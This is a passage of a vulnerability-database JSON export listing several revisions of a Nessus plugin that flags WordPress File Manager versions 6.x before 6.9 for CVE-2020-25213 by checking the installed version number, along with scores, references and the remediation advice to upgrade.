sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": [], "solution": "Upgrade the 'File Manager' plugin to version 6.9 or later.", "nessusSeverity": "", "cvssScoreSource": "CVE-2020-25213", "vpr": {"risk factor": "Critical", "score": "9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-09-01T00:00:00", "vulnerabilityPublicationDate": "2020-09-01T00:00:00", "exploitableWith": ["Metasploit: WordPress File Manager Unauthenticated Remote Code Execution"]}, "lastseen": "2021-08-05T12:59:31", "differentElements": ["cpe"], "edition": 7}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "0a906bd6639049c17e6eb71a3664c8f2", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to 6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An unauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php file, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-09-04T00:00:00", "modified": "2020-11-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?53de38d7", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-08-06T13:36:17", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}], "modified": "2021-08-06T13:36:17", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-08-06T13:36:17", "rev": 2}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Upgrade the 'File Manager' plugin to version 6.9 or later.", "nessusSeverity": "", "cvssScoreSource": "CVE-2020-25213", "vpr": {"risk factor": "Critical", "score": "9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-09-01T00:00:00", "vulnerabilityPublicationDate": "2020-09-01T00:00:00", "exploitableWith": ["Metasploit: WordPress File Manager Unauthenticated Remote Code Execution"]}, "lastseen": "2021-08-06T13:36:17", "differentElements": ["vpr"], "edition": 8}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "77ff4b01f75a60d391e4d32d7390a7c0", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to 6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An unauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php file, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-09-04T00:00:00", "modified": "2020-11-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213", "http://www.nessus.org/u?53de38d7"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-08-12T23:41:43", "history": [], "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}], "modified": "2021-08-12T23:41:43", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-08-12T23:41:43", "rev": 2}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Upgrade the 'File Manager' plugin to version 6.9 or later.", "nessusSeverity": "", "cvssScoreSource": "CVE-2020-25213", "vpr": {"risk factor": "Critical", "score": "9.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-09-01T00:00:00", "vulnerabilityPublicationDate": "2020-09-01T00:00:00", "exploitableWith": ["Metasploit: WordPress File Manager Unauthenticated Remote Code Execution"]}, "lastseen": "2021-08-12T23:41:43", "differentElements": ["exploitableWith", "nessusSeverity"], "edition": 9}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "aaaeeab8a8a7aae1437ac2d03ef9148e", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to 6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An unauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php file, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-09-04T00:00:00", "modified": "2020-11-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?53de38d7", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-08-19T12:13:29", "history": [], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}], "modified": "2021-08-19T12:13:29", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-08-19T12:13:29", "rev": 2}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Upgrade the 'File Manager' plugin to version 6.9 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2020-25213", "vpr": {"risk factor": "Critical", "score": "9.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-09-01T00:00:00", "vulnerabilityPublicationDate": "2020-09-01T00:00:00", "exploitableWith": ["Metasploit(WordPress File Manager Unauthenticated Remote Code Execution)"]}, "lastseen": "2021-08-19T12:13:29", "differentElements": ["vpr"], "edition": 10}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "83e2d496d14868695ec73bba7ddf8e41", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to 6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An unauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php file, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-09-04T00:00:00", "modified": "2020-11-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213", "http://www.nessus.org/u?53de38d7"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-08-25T23:55:30", "history": [], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-08-25T23:55:30", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-08-25T23:55:30", "rev": 2}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Upgrade the 'File Manager' plugin to version 6.9 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2020-25213", "vpr": {"risk factor": "Critical", "score": "9.5"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-09-01T00:00:00", "vulnerabilityPublicationDate": "2020-09-01T00:00:00", "exploitableWith": ["Metasploit(WordPress File Manager Unauthenticated Remote Code Execution)"]}, "lastseen": "2021-08-25T23:55:30", "differentElements": ["vpr"], "edition": 11}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "0d40be61597f9ef6d3911d6c34b162fc", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to 6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An unauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php file, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-09-04T00:00:00", "modified": "2020-11-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213", "http://www.nessus.org/u?53de38d7"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-04T00:44:29", "history": [], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-04T00:44:29", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-09-04T00:44:29", "rev": 2}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n 